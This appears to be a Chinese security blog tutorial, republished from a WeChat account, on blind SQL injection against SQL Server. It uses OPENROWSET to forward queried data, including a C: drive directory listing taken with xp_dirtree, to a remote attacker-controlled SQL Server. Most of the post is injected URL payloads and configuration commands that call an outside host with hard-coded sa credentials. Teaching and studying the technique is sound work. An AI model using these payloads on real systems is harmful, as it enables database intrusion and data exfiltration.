SQL注入基础 sqlserver openrowset转发利用

admin

102262
文章

87
评论

2022年5月24日09:25:08评论98 views字数 1406阅读4分41秒阅读模式

点击上方“蓝字”关注我们

sqlserver openrowset转发利用

简介

适用于盲注入，页面不返回信息使用这种注入方法，需要一台带有sqlserver的机器。

原理就是把当前数据转发到远程的sqlserver上。

启用Ad Hoc Distributed Queries：

;exec sp_configure 'show advanced options',1 reconfigure

;exec sp_configure 'Ad Hoc Distributed Queries',1 reconfigure

为了安全使用完成后，关闭Ad Hoc Distributed Queries：

;exec sp_configure 'Ad Hoc Distributed Queries',0 reconfigure

;exec sp_configure 'show advanced options',0 reconfigure

开启扩展

http://www.demo1.com/index.aspx?id=1;exec sp_configure ‘show advanced options’,1 reconfigure;exec sp_configure ‘Ad Hoc Distributed Queries’,1 reconfigure

本地建立临时表

create table ##version (VERSION varchar(500))

查询系统信息

http://www.demo1.com/index.aspx?id=1;insert into OPENROWSET('SQLOLEDB', 'server=192.168.0.122;uid=sa;pwd=123456', 'select * from %23%23version' ) select DB_NAME()

SQL注入基础 sqlserver openrowset转发利用

执行上面语句之后再来查询远程sqlserver上的表

select * from ##version

SQL注入基础 sqlserver openrowset转发利用

两边创建临时表

create table ##nonamed( dir ntext, num int )

http://www.demo1.com/index.aspx?id=1;create table %23%23nonamed( dir ntext, num int )

查询路径

insert %23%23nonamed execute master..xp_dirtree 'c:/',1

向nonamed表插入c盘下路径的数据

http://www.demo1.com/index.aspx?id=1;insert %23%23nonamed execute master..xp_dirtree 'c:/',1

这里就是把数据转发到远程192.168.0.122 sqlserver上

http://www.demo1.com/index.aspx?id=1;insert into OPENROWSET('SQLOLEDB', 'server=192.168.0.122;uid=sa;pwd=123456', 'select * from %23%23nonamed' ) select * from %23%23nonamed

在远程sqlserver执行这个命令就可以获取数据

select * from %23%23nonamed

SQL注入基础 sqlserver openrowset转发利用

关注公众号

温馨提示

如果你喜欢本文，请分享到朋友圈，想要获得更多信息，请关注我。

健身少女

SQL注入基础 sqlserver openrowset转发利用

原文始发于微信公众号（moonsec）：SQL注入基础 sqlserver openrowset转发利用

左青龙
微信扫一扫

右白虎
微信扫一扫

SQL注入基础 sqlserver openrowset转发利用

【论文速读】|理解基于大语言模型的模糊测试驱动程序生成

Web攻击应急响应 | 干货

基于ChatGPT大语言模型，通过聊天机器人自动创建vulhub的漏洞靶机环境

科恩BinaryAI@ICSE2024论文解读｜基于大模型的二进制软件成分分析

网络认证：一文带你了解Juniper认证体系！

eBPF及HTTPS明文抓包的分析

京师心智心理健康测评系统 MyReport.ashx 信息泄露漏洞复现

shiro反序列化漏洞绕waf防护的方法总结 | 干货

关于我挖洞的经历

LLM 安全 | 大语言模型应用安全入门

发表评论

在线咨询

微信